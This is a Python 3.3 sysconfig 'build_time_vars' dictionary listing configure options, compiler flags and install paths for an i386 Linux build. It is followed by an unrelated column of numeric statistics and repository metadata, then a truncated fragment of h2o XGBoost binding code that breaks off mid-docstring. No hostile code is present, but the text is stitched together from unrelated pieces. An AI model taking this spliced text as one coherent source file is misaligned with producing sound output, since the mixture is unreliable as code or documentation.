build_time_vars={'HAVE_SYS_WAIT_H': 1, 'HAVE_UTIL_H': 0, 'HAVE_SYMLINKAT': 1, 'HAVE_LIBSENDFILE': 0, 'SRCDIRS': 'Parser Grammar Objects Python Modules Mac', 'SIZEOF_OFF_T': 8, 'BASECFLAGS': '-Wno-unused-result', 'HAVE_UTIME_H': 1, 'EXTRAMACHDEPPATH': '', 'HAVE_SYS_TIME_H': 1, 'CFLAGSFORSHARED': '-fPIC', 'HAVE_HYPOT': 1, 'PGSRCS': '\\', 'HAVE_LIBUTIL_H': 0, 'HAVE_COMPUTED_GOTOS': 1, 'HAVE_LUTIMES': 1, 'HAVE_MAKEDEV': 1, 'HAVE_REALPATH': 1, 'HAVE_LINUX_TIPC_H': 1, 'MULTIARCH': 'i386-linux-gnu', 'HAVE_GETWD': 1, 'HAVE_GCC_ASM_FOR_X64': 0, 'HAVE_INET_PTON': 1, 'HAVE_GETHOSTBYNAME_R_6_ARG': 1, 'SIZEOF__BOOL': 1, 'HAVE_ZLIB_COPY': 1, 'ASDLGEN': 'python3.3 ../Parser/asdl_c.py', 'GRAMMAR_INPUT': '../Grammar/Grammar', 'HOST_GNU_TYPE': 'i686-pc-linux-gnu', 'HAVE_SCHED_RR_GET_INTERVAL': 1, 'HAVE_BLUETOOTH_H': 0, 'HAVE_MKFIFO': 1, 'TIMEMODULE_LIB': 0, 'LIBM': '-lm', 'PGENOBJS': '\\ \\', 'PYTHONFRAMEWORK': '', 'GETPGRP_HAVE_ARG': 0, 'HAVE_MMAP': 1, 'SHLIB_SUFFIX': '.so', 'SIZEOF_FLOAT': 4, 'HAVE_RENAMEAT': 1, 'HAVE_LANGINFO_H': 1, 'HAVE_STDLIB_H': 1, 'PY_CORE_CFLAGS': '-Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -I. -IInclude -I../Include -D_FORTIFY_SOURCE=2 -fPIC -DPy_BUILD_CORE', 'HAVE_BROKEN_PIPE_BUF': 0, 'HAVE_CONFSTR': 1, 'HAVE_SIGTIMEDWAIT': 1, 'HAVE_FTELLO': 1, 'READELF': 'readelf', 'HAVE_SIGALTSTACK': 1, 'TESTTIMEOUT': 3600, 'PYTHONPATH': ':plat-i386-linux-gnu', 'SIZEOF_WCHAR_T': 4, 'LIBOBJS': '', 'HAVE_SYSCONF': 1, 'MAKESETUP': '../Modules/makesetup', 'HAVE_UTIMENSAT': 1, 'HAVE_FCHOWNAT': 1, 'HAVE_WORKING_TZSET': 1, 'HAVE_FINITE': 1, 'HAVE_ASINH': 1, 'HAVE_SETEUID': 1, 'CONFIGFILES': 'configure configure.ac acconfig.h pyconfig.h.in Makefile.pre.in', 'HAVE_SETGROUPS': 1, 'PARSER_OBJS': '\\ Parser/myreadline.o Parser/parsetok.o Parser/tokenizer.o', 'HAVE_MBRTOWC': 1, 'SIZEOF_INT': 4, 'HAVE_STDARG_PROTOTYPES': 1, 'TM_IN_SYS_TIME': 0, 'HAVE_SYS_TIMES_H': 1, 'HAVE_LCHOWN': 1, 'HAVE_SSIZE_T': 1, 'HAVE_PAUSE': 1, 'SYSLIBS': '-lm', 'POSIX_SEMAPHORES_NOT_ENABLED': 0, 'HAVE_DEVICE_MACROS': 1, 'BLDSHARED': 'i686-linux-gnu-gcc -pthread -shared -Wl,-O1 -Wl,-Bsymbolic-functions -Wl,-Bsymbolic-functions -Wl,-z,relro -Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ', 'LIBSUBDIRS': 'tkinter tkinter/test tkinter/test/test_tkinter \\', 'HAVE_SYS_UN_H': 1, 'HAVE_SYS_STAT_H': 1, 'VPATH': '..', 'INCLDIRSTOMAKE': '/usr/include /usr/include /usr/include/python3.3m /usr/include/python3.3m', 'HAVE_BROKEN_SEM_GETVALUE': 0, 'HAVE_TIMEGM': 1, 'PACKAGE_VERSION': 0, 'MAJOR_IN_SYSMACROS': 0, 'HAVE_ATANH': 1, 'HAVE_GAI_STRERROR': 1, 'HAVE_SYS_POLL_H': 1, 'SIZEOF_PTHREAD_T': 4, 'SIZEOF_FPOS_T': 16, 'HAVE_CTERMID': 1, 'HAVE_TMPFILE': 1, 'HAVE_SETUID': 1, 'CXX': 'i686-linux-gnu-g++ -pthread', 'srcdir': '..', 'HAVE_UINT32_T': 1, 'HAVE_ADDRINFO': 1, 'HAVE_GETSPENT': 1, 'SIZEOF_DOUBLE': 8, 'HAVE_INT32_T': 1, 'LIBRARY_OBJS_OMIT_FROZEN': '\\', 'HAVE_FUTIMES': 1, 'CONFINCLUDEPY': '/usr/include/python3.3m', 'HAVE_RL_COMPLETION_APPEND_CHARACTER': 1, 'LIBFFI_INCLUDEDIR': '', 'HAVE_SETGID': 1, 'HAVE_UINT64_T': 1, 'EXEMODE': 755, 'UNIVERSALSDK': '', 'HAVE_LIBDL': 1, 'HAVE_GETNAMEINFO': 1, 'HAVE_STDINT_H': 1, 'COREPYTHONPATH': ':plat-i386-linux-gnu', 'HAVE_SOCKADDR_STORAGE': 1, 'HAVE_WAITID': 1, 'EXTRAPLATDIR': '@EXTRAPLATDIR@', 'HAVE_ACCEPT4': 1, 'RUNSHARED': 'LD_LIBRARY_PATH=/build/buildd/python3.3-3.3.1/build-shared:', 'EXE': '', 
'HAVE_SIGACTION': 1, 'HAVE_CHOWN': 1, 'HAVE_GETLOGIN': 1, 'HAVE_TZNAME': 0, 'PACKAGE_NAME': 0, 'HAVE_GETPGID': 1, 'HAVE_GLIBC_MEMMOVE_BUG': 0, 'BUILD_GNU_TYPE': 'i686-pc-linux-gnu', 'HAVE_LINUX_CAN_H': 1, 'DYNLOADFILE': 'dynload_shlib.o', 'HAVE_PWRITE': 1, 'BUILDEXE': '', 'HAVE_OPENPTY': 1, 'HAVE_LOCKF': 1, 'HAVE_COPYSIGN': 1, 'HAVE_PREAD': 1, 'HAVE_DLOPEN': 1, 'HAVE_SYS_KERN_CONTROL_H': 0, 'PY_FORMAT_LONG_LONG': '"ll"', 'HAVE_TCSETPGRP': 1, 'HAVE_SETSID': 1, 'HAVE_STRUCT_STAT_ST_BIRTHTIME': 0, 'HAVE_STRING_H': 1, 'LDLIBRARY': 'libpython3.3m.so', 'INSTALL_SCRIPT': '/usr/bin/install -c', 'HAVE_SYS_XATTR_H': 1, 'HAVE_CURSES_IS_TERM_RESIZED': 1, 'HAVE_TMPNAM_R': 1, 'STRICT_SYSV_CURSES': "/* Don't use ncurses extensions */", 'WANT_SIGFPE_HANDLER': 1, 'HAVE_INT64_T': 1, 'HAVE_STAT_TV_NSEC': 1, 'HAVE_SYS_MKDEV_H': 0, 'HAVE_BROKEN_POLL': 0, 'HAVE_IF_NAMEINDEX': 1, 'HAVE_GETPWENT': 1, 'PSRCS': '\\', 'RANLIB': 'ranlib', 'HAVE_WCSCOLL': 1, 'WITH_NEXT_FRAMEWORK': 0, 'ASDLGEN_FILES': '../Parser/asdl.py ../Parser/asdl_c.py', 'HAVE_RL_PRE_INPUT_HOOK': 1, 'PACKAGE_URL': 0, 'SHLIB_EXT': 0, 'HAVE_SYS_LOADAVG_H': 0, 'HAVE_LIBIEEE': 0, 'HAVE_SEM_OPEN': 1, 'HAVE_TERM_H': 1, 'IO_OBJS': '\\', 'IO_H': 'Modules/_io/_iomodule.h', 'HAVE_STATVFS': 1, 'VERSION': '3.3', 'HAVE_GETC_UNLOCKED': 1, 'MACHDEPS': 'plat-i386-linux-gnu @EXTRAPLATDIR@', 'SUBDIRSTOO': 'Include Lib Misc', 'HAVE_SETREUID': 1, 'HAVE_ERFC': 1, 'HAVE_SETRESUID': 1, 'LINKFORSHARED': '-Xlinker -export-dynamic -Wl,-O1 -Wl,-Bsymbolic-functions', 'HAVE_SYS_TYPES_H': 1, 'HAVE_GETPAGESIZE': 1, 'HAVE_SETEGID': 1, 'HAVE_PTY_H': 1, 'HAVE_STRUCT_STAT_ST_FLAGS': 0, 'HAVE_WCHAR_H': 1, 'HAVE_FSEEKO': 1, 'Py_ENABLE_SHARED': 1, 'HAVE_SIGRELSE': 1, 'HAVE_PTHREAD_INIT': 0, 'FILEMODE': 644, 'HAVE_SYS_RESOURCE_H': 1, 'HAVE_READLINKAT': 1, 'PYLONG_BITS_IN_DIGIT': 0, 'LINKCC': 'i686-linux-gnu-gcc -pthread', 'HAVE_SETLOCALE': 1, 'HAVE_CHROOT': 1, 'HAVE_OPENAT': 1, 'HAVE_FEXECVE': 1, 'LDCXXSHARED': 'i686-linux-gnu-g++ -pthread -shared -Wl,-O1 -Wl,-Bsymbolic-functions', 'DIST': 'README ChangeLog configure configure.ac acconfig.h pyconfig.h.in Makefile.pre.in Include Lib Misc Ext-dummy', 'HAVE_MKNOD': 1, 'PY_LDFLAGS': '-Wl,-Bsymbolic-functions -Wl,-z,relro', 'HAVE_BROKEN_MBSTOWCS': 0, 'LIBRARY_OBJS': '\\', 'HAVE_LOG1P': 1, 'SIZEOF_VOID_P': 4, 'HAVE_FCHOWN': 1, 'PYTHONFRAMEWORKPREFIX': '', 'HAVE_LIBDLD': 0, 'HAVE_TGAMMA': 1, 'HAVE_ERRNO_H': 1, 'HAVE_IO_H': 0, 'OTHER_LIBTOOL_OPT': '', 'HAVE_POLL_H': 1, 'PY_CPPFLAGS': '-I. 
-IInclude -I../Include -D_FORTIFY_SOURCE=2', 'XMLLIBSUBDIRS': 'xml xml/dom xml/etree xml/parsers xml/sax', 'GRAMMAR_H': 'Include/graminit.h', 'TANH_PRESERVES_ZERO_SIGN': 1, 'HAVE_GETLOADAVG': 1, 'UNICODE_DEPS': '\\ \\', 'HAVE_GETCWD': 1, 'MANDIR': '/usr/share/man', 'MACHDESTLIB': '/usr/lib/python3.3', 'GRAMMAR_C': 'Python/graminit.c', 'PGOBJS': '\\', 'HAVE_DEV_PTMX': 1, 'HAVE_UINTPTR_T': 1, 'HAVE_SCHED_SETAFFINITY': 1, 'PURIFY': '', 'HAVE_DECL_ISINF': 1, 'HAVE_RL_CALLBACK': 1, 'HAVE_WRITEV': 1, 'HAVE_GETHOSTBYNAME_R_5_ARG': 0, 'HAVE_SYS_AUDIOIO_H': 0, 'EXT_SUFFIX': '.cpython-33m.so', 'SIZEOF_LONG_LONG': 8, 'DLINCLDIR': '.', 'HAVE_PATHCONF': 1, 'HAVE_UNLINKAT': 1, 'MKDIR_P': '/bin/mkdir -p', 'HAVE_ALTZONE': 0, 'SCRIPTDIR': '/usr/lib', 'OPCODETARGETGEN_FILES': '\\', 'HAVE_GETSPNAM': 1, 'HAVE_SYS_TERMIO_H': 0, 'HAVE_ATTRIBUTE_FORMAT_PARSETUPLE': 0, 'HAVE_PTHREAD_H': 1, 'Py_DEBUG': 0, 'HAVE_STRUCT_STAT_ST_BLOCKS': 1, 'X87_DOUBLE_ROUNDING': 1, 'SIZEOF_TIME_T': 4, 'HAVE_DYNAMIC_LOADING': 1, 'HAVE_DIRECT_H': 0, 'SRC_GDB_HOOKS': '../Tools/gdb/libpython.py', 'HAVE_GETADDRINFO': 1, 'HAVE_BROKEN_NICE': 0, 'HAVE_DIRENT_H': 1, 'HAVE_WCSXFRM': 1, 'HAVE_RL_COMPLETION_DISPLAY_MATCHES_HOOK': 1, 'HAVE_FSTATVFS': 1, 'PYTHON': 'python', 'HAVE_OSX105_SDK': 0, 'BINDIR': '/usr/bin', 'TESTPYTHON': 'LD_LIBRARY_PATH=/build/buildd/python3.3-3.3.1/build-shared: ./python', 'ARFLAGS': 'rc', 'PLATDIR': 'plat-i386-linux-gnu', 'HAVE_ASM_TYPES_H': 1, 'PY3LIBRARY': 'libpython3.so', 'HAVE_PLOCK': 0, 'FLOCK_NEEDS_LIBBSD': 0, 'WITH_TSC': 0, 'HAVE_LIBREADLINE': 1, 'MACHDEP': 'linux', 'HAVE_SELECT': 1, 'LDFLAGS': '-Wl,-Bsymbolic-functions -Wl,-z,relro', 'HAVE_HSTRERROR': 1, 'SOABI': 'cpython-33m', 'HAVE_GETTIMEOFDAY': 1, 'HAVE_LIBRESOLV': 0, 'HAVE_UNSETENV': 1, 'HAVE_TM_ZONE': 1, 'HAVE_GETPGRP': 1, 'HAVE_FLOCK': 1, 'HAVE_SYS_BSDTTY_H': 0, 'SUBDIRS': '', 'PYTHONFRAMEWORKINSTALLDIR': '', 'PACKAGE_BUGREPORT': 0, 'HAVE_CLOCK': 1, 'HAVE_GETPEERNAME': 1, 'SIZEOF_PID_T': 4, 'HAVE_CONIO_H': 0, 'HAVE_FSTATAT': 1, 'HAVE_NETPACKET_PACKET_H': 1, 'HAVE_WAIT3': 1, 'DESTPATH': '', 'HAVE_STAT_TV_NSEC2': 0, 'HAVE_GETRESGID': 1, 'HAVE_UCS4_TCL': 0, 'SIGNED_RIGHT_SHIFT_ZERO_FILLS': 0, 'HAVE_TIMES': 1, 'HAVE_UNAME': 1, 'HAVE_ERF': 1, 'SIZEOF_SHORT': 2, 'HAVE_NCURSES_H': 1, 'HAVE_SYS_SENDFILE_H': 1, 'HAVE_CTERMID_R': 0, 'HAVE_TMPNAM': 1, 'prefix': '/usr', 'HAVE_NICE': 1, 'WITH_THREAD': 1, 'LN': 'ln', 'TESTRUNNER': 'LD_LIBRARY_PATH=/build/buildd/python3.3-3.3.1/build-shared: ./python ../Tools/scripts/run_tests.py', 'HAVE_SIGINTERRUPT': 1, 'HAVE_SETPGID': 1, 'RETSIGTYPE': 'void', 'HAVE_SCHED_GET_PRIORITY_MAX': 1, 'HAVE_SYS_SYS_DOMAIN_H': 0, 'HAVE_SYS_DIR_H': 0, 'HAVE__GETPTY': 0, 'HAVE_BLUETOOTH_BLUETOOTH_H': 1, 'HAVE_BIND_TEXTDOMAIN_CODESET': 1, 'HAVE_POLL': 1, 'PYTHON_OBJS': '\\', 'HAVE_WAITPID': 1, 'USE_INLINE': 1, 'HAVE_FUTIMENS': 1, 'USE_COMPUTED_GOTOS': 1, 'MAINCC': 'i686-linux-gnu-gcc -pthread', 'HAVE_SOCKETPAIR': 1, 'HAVE_PROCESS_H': 0, 'HAVE_SETVBUF': 1, 'HAVE_FDOPENDIR': 1, 'CONFINCLUDEDIR': '/usr/include', 'BINLIBDEST': '/usr/lib/python3.3', 'HAVE_SYS_IOCTL_H': 1, 'HAVE_SYSEXITS_H': 1, 'LDLAST': '', 'HAVE_SYS_FILE_H': 1, 'HAVE_RL_COMPLETION_SUPPRESS_APPEND': 1, 'HAVE_RL_COMPLETION_MATCHES': 1, 'HAVE_TCGETPGRP': 1, 'SIZEOF_SIZE_T': 4, 'HAVE_EPOLL_CREATE1': 1, 'HAVE_SYS_SELECT_H': 1, 'HAVE_CLOCK_GETTIME': 1, 'CFLAGS': '-Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ', 'HAVE_SNPRINTF': 1, 'BLDLIBRARY': '-lpython3.3m', 'PARSER_HEADERS': '\\', 
'SO': '.so', 'LIBRARY': 'libpython3.3m.a', 'HAVE_FPATHCONF': 1, 'HAVE_TERMIOS_H': 1, 'HAVE_BROKEN_PTHREAD_SIGMASK': 0, 'AST_H': 'Include/Python-ast.h', 'HAVE_GCC_UINT128_T': 0, 'HAVE_ACOSH': 1, 'MODOBJS': 'Modules/_threadmodule.o Modules/signalmodule.o Modules/arraymodule.o Modules/mathmodule.o Modules/_math.o Modules/_struct.o Modules/timemodule.o Modules/_randommodule.o Modules/atexitmodule.o Modules/_elementtree.o Modules/_pickle.o Modules/_datetimemodule.o Modules/_bisectmodule.o Modules/_heapqmodule.o Modules/unicodedata.o Modules/fcntlmodule.o Modules/spwdmodule.o Modules/grpmodule.o Modules/selectmodule.o Modules/socketmodule.o Modules/_posixsubprocess.o Modules/md5module.o Modules/sha1module.o Modules/sha256module.o Modules/sha512module.o Modules/syslogmodule.o Modules/binascii.o Modules/zlibmodule.o Modules/pyexpat.o Modules/posixmodule.o Modules/errnomodule.o Modules/pwdmodule.o Modules/_sre.o Modules/_codecsmodule.o Modules/_weakref.o Modules/_functoolsmodule.o Modules/operator.o Modules/_collectionsmodule.o Modules/itertoolsmodule.o Modules/_localemodule.o Modules/_iomodule.o Modules/iobase.o Modules/fileio.o Modules/bytesio.o Modules/bufferedio.o Modules/textio.o Modules/stringio.o Modules/zipimport.o Modules/faulthandler.o Modules/symtablemodule.o Modules/xxsubtype.o', 'AST_C': 'Python/Python-ast.c', 'HAVE_SYS_NDIR_H': 0, 'DESTDIRS': '/usr /usr/lib /usr/lib/python3.3 /usr/lib/python3.3/lib-dynload', 'HAVE_SIGNAL_H': 1, 'PACKAGE_TARNAME': 0, 'HAVE_GETPRIORITY': 1, 'INCLUDEDIR': '/usr/include', 'HAVE_INTTYPES_H': 1, 'SIGNAL_OBJS': '', 'HAVE_READV': 1, 'HAVE_SETHOSTNAME': 1, 'MODLIBS': '-lrt -lexpat -L/usr/lib -lz -lexpat', 'CC': 'i686-linux-gnu-gcc -pthread', 'HAVE_LCHMOD': 0, 'SIZEOF_UINTPTR_T': 4, 'LIBPC': '/usr/lib/i386-linux-gnu/pkgconfig', 'BYTESTR_DEPS': '\\', 'HAVE_MKDIRAT': 1, 'LIBPL': '/usr/lib/python3.3/config-3.3m-i386-linux-gnu', 'HAVE_SHADOW_H': 1, 'HAVE_SYS_EVENT_H': 0, 'INSTALL': '/usr/bin/install -c', 'HAVE_GCC_ASM_FOR_X87': 1, 'HAVE_BROKEN_UNSETENV': 0, 'BASECPPFLAGS': '', 'DOUBLE_IS_BIG_ENDIAN_IEEE754': 0, 'HAVE_STRUCT_STAT_ST_RDEV': 1, 'HAVE_SEM_UNLINK': 1, 'BUILDPYTHON': 'python', 'HAVE_RL_CATCH_SIGNAL': 1, 'HAVE_DECL_TZNAME': 0, 'RESSRCDIR': 'Mac/Resources/framework', 'HAVE_PTHREAD_SIGMASK': 1, 'HAVE_UTIMES': 1, 'DISTDIRS': 'Include Lib Misc Ext-dummy', 'HAVE_FDATASYNC': 1, 'HAVE_USABLE_WCHAR_T': 0, 'PY_FORMAT_SIZE_T': '"z"', 'HAVE_SCHED_SETSCHEDULER': 1, 'VA_LIST_IS_ARRAY': 0, 'HAVE_LINUX_NETLINK_H': 1, 'HAVE_SETREGID': 1, 'HAVE_STROPTS_H': 1, 'LDVERSION': '3.3m', 'abs_builddir': '/build/buildd/python3.3-3.3.1/build-shared', 'SITEPATH': '', 'HAVE_GETHOSTBYNAME': 0, 'HAVE_SIGPENDING': 1, 'HAVE_KQUEUE': 0, 'HAVE_SYNC': 1, 'HAVE_GETSID': 1, 'HAVE_ROUND': 1, 'HAVE_STRFTIME': 1, 'AST_H_DIR': 'Include', 'HAVE_PIPE2': 1, 'AST_C_DIR': 'Python', 'TESTPYTHONOPTS': '', 'HAVE_DEV_PTC': 0, 'GETTIMEOFDAY_NO_TZ': 0, 'HAVE_NET_IF_H': 1, 'HAVE_SENDFILE': 1, 'HAVE_SETPGRP': 1, 'HAVE_SEM_GETVALUE': 1, 'CONFIGURE_LDFLAGS': '-Wl,-Bsymbolic-functions -Wl,-z,relro', 'DLLLIBRARY': '', 'PYTHON_FOR_BUILD': './python -E', 'SETPGRP_HAVE_ARG': 0, 'HAVE_INET_ATON': 1, 'INSTALL_SHARED': '/usr/bin/install -c -m 555', 'WITH_DOC_STRINGS': 1, 'OPCODETARGETS_H': '\\', 'HAVE_INITGROUPS': 1, 'HAVE_LINKAT': 1, 'BASEMODLIBS': '', 'SGI_ABI': '', 'HAVE_SCHED_SETPARAM': 1, 'OPT': '-DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes', 'HAVE_POSIX_FADVISE': 1, 'datarootdir': '/usr/share', 'HAVE_MEMRCHR': 1, 'HGTAG': '', 'HAVE_MEMMOVE': 1, 'HAVE_GETRESUID': 1, 'DOUBLE_IS_ARM_MIXED_ENDIAN_IEEE754': 0, 
'HAVE_LSTAT': 1, 'AR': 'ar', 'HAVE_WAIT4': 1, 'HAVE_SYS_MODEM_H': 0, 'INSTSONAME': 'libpython3.3m.so.1.0', 'HAVE_SYS_STATVFS_H': 1, 'HAVE_LGAMMA': 1, 'HAVE_PROTOTYPES': 1, 'HAVE_SYS_UIO_H': 1, 'MAJOR_IN_MKDEV': 0, 'QUICKTESTOPTS': '-x test_subprocess test_io test_lib2to3 \\', 'HAVE_SYS_DEVPOLL_H': 0, 'HAVE_CHFLAGS': 0, 'HAVE_FSYNC': 1, 'HAVE_FCHMOD': 1, 'INCLUDEPY': '/usr/include/python3.3m', 'HAVE_SEM_TIMEDWAIT': 1, 'LDLIBRARYDIR': '', 'HAVE_STRUCT_TM_TM_ZONE': 1, 'HAVE_CURSES_H': 1, 'TIME_WITH_SYS_TIME': 1, 'HAVE_DUP2': 1, 'ENABLE_IPV6': 1, 'WITH_VALGRIND': 0, 'HAVE_SETITIMER': 1, 'THREADOBJ': 'Python/thread.o', 'LOCALMODLIBS': '-lrt -lexpat -L/usr/lib -lz -lexpat', 'HAVE_MEMORY_H': 1, 'HAVE_GETITIMER': 1, 'HAVE_C99_BOOL': 1, 'INSTALL_DATA': '/usr/bin/install -c -m 644', 'PGEN': 'Parser/pgen', 'HAVE_GRP_H': 1, 'HAVE_WCSFTIME': 1, 'AIX_GENUINE_CPLUSPLUS': 0, 'HAVE_LIBINTL_H': 1, 'SHELL': '/bin/sh', 'HAVE_UNISTD_H': 1, 'EXTRATESTOPTS': '', 'HAVE_EXECV': 1, 'HAVE_FSEEK64': 0, 'MVWDELCH_IS_EXPRESSION': 1, 'DESTSHARED': '/usr/lib/python3.3/lib-dynload', 'OPCODETARGETGEN': '\\', 'LIBDEST': '/usr/lib/python3.3', 'CCSHARED': '-fPIC', 'HAVE_EXPM1': 1, 'HAVE_DLFCN_H': 1, 'exec_prefix': '/usr', 'HAVE_READLINK': 1, 'WINDOW_HAS_FLAGS': 1, 'HAVE_FTELL64': 0, 'HAVE_STRLCPY': 0, 'MACOSX_DEPLOYMENT_TARGET': '', 'HAVE_SYS_SYSCALL_H': 1, 'DESTLIB': '/usr/lib/python3.3', 'LDSHARED': 'i686-linux-gnu-gcc -pthread -shared -Wl,-O1 -Wl,-Bsymbolic-functions -Wl,-Bsymbolic-functions -Wl,-z,relro -Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ', 'HGVERSION': '', 'PYTHON_HEADERS': '\\', 'HAVE_STRINGS_H': 1, 'DOUBLE_IS_LITTLE_ENDIAN_IEEE754': 1, 'HAVE_POSIX_FALLOCATE': 1, 'HAVE_DIRFD': 1, 'HAVE_LOG2': 1, 'HAVE_GETPID': 1, 'HAVE_ALARM': 1, 'MACHDEP_OBJS': '', 'HAVE_SPAWN_H': 1, 'HAVE_FORK': 1, 'HAVE_SETRESGID': 1, 'HAVE_FCHMODAT': 1, 'HAVE_CLOCK_GETRES': 1, 'MACHDEPPATH': ':plat-i386-linux-gnu', 'STDC_HEADERS': 1, 'HAVE_SETPRIORITY': 1, 'LIBC': '', 'HAVE_SYS_EPOLL_H': 1, 'HAVE_SYS_UTSNAME_H': 1, 'HAVE_PUTENV': 1, 'HAVE_CURSES_RESIZE_TERM': 1, 'HAVE_FUTIMESAT': 1, 'WITH_DYLD': 0, 'INSTALL_PROGRAM': '/usr/bin/install -c', 'LIBS': '-lpthread -ldl -lutil', 'HAVE_TRUNCATE': 1, 'TESTOPTS': '', 'PROFILE_TASK': '../Tools/pybench/pybench.py -n 2 --with-gc --with-syscheck', 'HAVE_CURSES_RESIZETERM': 1, 'ABIFLAGS': 'm', 'HAVE_GETGROUPLIST': 1, 'OBJECT_OBJS': '\\', 'HAVE_MKNODAT': 1, 'HAVE_ST_BLOCKS': 1, 'HAVE_STRUCT_STAT_ST_GEN': 0, 'SYS_SELECT_WITH_SYS_TIME': 1, 'SHLIBS': '-lpthread -ldl -lutil', 'HAVE_GETGROUPS': 1, 'MODULE_OBJS': '\\', 'PYTHONFRAMEWORKDIR': 'no-framework', 'HAVE_FCNTL_H': 1, 'HAVE_LINK': 1, 'HAVE_SIGWAIT': 1, 'HAVE_GAMMA': 1, 'HAVE_SYS_LOCK_H': 0, 'HAVE_FORKPTY': 1, 'HAVE_SOCKADDR_SA_LEN': 0, 'HAVE_TEMPNAM': 1, 'HAVE_STRUCT_STAT_ST_BLKSIZE': 1, 'HAVE_MKFIFOAT': 1, 'HAVE_SIGWAITINFO': 1, 'HAVE_FTIME': 1, 'HAVE_EPOLL': 1, 'HAVE_SYS_SOCKET_H': 1, 'HAVE_LARGEFILE_SUPPORT': 1, 'CONFIGURE_CFLAGS': '-g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security', 'HAVE_PTHREAD_DESTRUCTOR': 0, 'CONFIGURE_CPPFLAGS': '-D_FORTIFY_SOURCE=2', 'HAVE_SYMLINK': 1, 'HAVE_LONG_LONG': 1, 'HAVE_IEEEFP_H': 0, 'LIBDIR': '/usr/lib', 'HAVE_PTHREAD_KILL': 1, 'TESTPATH': '', 'HAVE_STRDUP': 1, 'POBJS': '\\', 'NO_AS_NEEDED': '-Wl,--no-as-needed', 'HAVE_LONG_DOUBLE': 1, 'HGBRANCH': '', 'DISTFILES': 'README ChangeLog configure configure.ac acconfig.h pyconfig.h.in Makefile.pre.in', 'PTHREAD_SYSTEM_SCHED_SUPPORTED': 1, 
'HAVE_FACCESSAT': 1, 'AST_ASDL': '../Parser/Python.asdl', 'CPPFLAGS': '-I. -IInclude -I../Include -D_FORTIFY_SOURCE=2', 'HAVE_MKTIME': 1, 'HAVE_NDIR_H': 0, 'PY_CFLAGS': '-Wno-unused-result -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ', 'LIBOBJDIR': 'Python/', 'HAVE_LINUX_CAN_RAW_H': 1, 'HAVE_GETHOSTBYNAME_R_3_ARG': 0, 'PACKAGE_STRING': 0, 'GNULD': 'yes', 'LOG1P_DROPS_ZERO_SIGN': 0, 'HAVE_FTRUNCATE': 1, 'WITH_LIBINTL': 0, 'HAVE_MREMAP': 1, 'HAVE_DECL_ISNAN': 1, 'HAVE_KILLPG': 1, 'SIZEOF_LONG': 4, 'HAVE_DECL_ISFINITE': 1, 'HAVE_IPA_PURE_CONST_BUG': 0, 'WITH_PYMALLOC': 1, 'abs_srcdir': '/build/buildd/python3.3-3.3.1/build-shared/..', 'HAVE_FCHDIR': 1, 'HAVE_BROKEN_POSIX_SEMAPHORES': 0, 'AC_APPLE_UNIVERSAL_BUILD': 0, 'PGENSRCS': '\\ \\', 'DIRMODE': 755, 'HAVE_GETHOSTBYNAME_R': 1, 'HAVE_LCHFLAGS': 0, 'HAVE_SYS_PARAM_H': 1, 'SIZEOF_LONG_DOUBLE': 12, 'CONFIG_ARGS': "'--enable-shared' '--prefix=/usr' '--enable-ipv6' '--enable-loadable-sqlite-extensions' '--with-dbmliborder=bdb:gdbm' '--with-computed-gotos' '--with-system-expat' '--with-system-ffi' '--with-fpectl' 'CC=i686-linux-gnu-gcc' 'CFLAGS=-g -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security ' 'LDFLAGS=-Wl,-Bsymbolic-functions -Wl,-z,relro' 'CPPFLAGS=-D_FORTIFY_SOURCE=2'", 'HAVE_SCHED_H': 1, 'HAVE_KILL': 1}
| 6,055.666667
| 18,165
| 0.710519
| 2,763
| 18,167
| 4.355411
| 0.296779
| 0.073542
| 0.015955
| 0.014625
| 0.192621
| 0.162955
| 0.143676
| 0.123567
| 0.114426
| 0.102294
| 0
| 0.039417
| 0.086696
| 18,167
| 2
| 18,166
| 9,083.5
| 0.685873
| 0
| 0
| 0
| 0
| 14
| 0.754982
| 0.186337
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
130f776ce8d86c26f26ea2e92d5b463a65ad577b
| 47,408
|
py
|
Python
|
h2o-bindings/bin/custom/python/gen_xgboost.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 1
|
2020-10-21T05:09:23.000Z
|
2020-10-21T05:09:23.000Z
|
h2o-bindings/bin/custom/python/gen_xgboost.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 1
|
2020-05-10T15:33:07.000Z
|
2020-05-10T15:33:07.000Z
|
h2o-bindings/bin/custom/python/gen_xgboost.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 1
|
2020-04-17T13:06:26.000Z
|
2020-04-17T13:06:26.000Z
|
def class_extensions():
@staticmethod
def available():
"""
Ask the H2O server whether an XGBoost model can be built (depends on availability of native backends).
:return: True if an XGBoost model can be built, or False otherwise.
:examples:
>>> boston = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/BostonHousing.csv")
>>> predictors = boston.columns[:-1]
>>> response = "medv"
>>> boston['chas'] = boston['chas'].asfactor()
>>> train, valid = boston.split_frame(ratios=[.8])
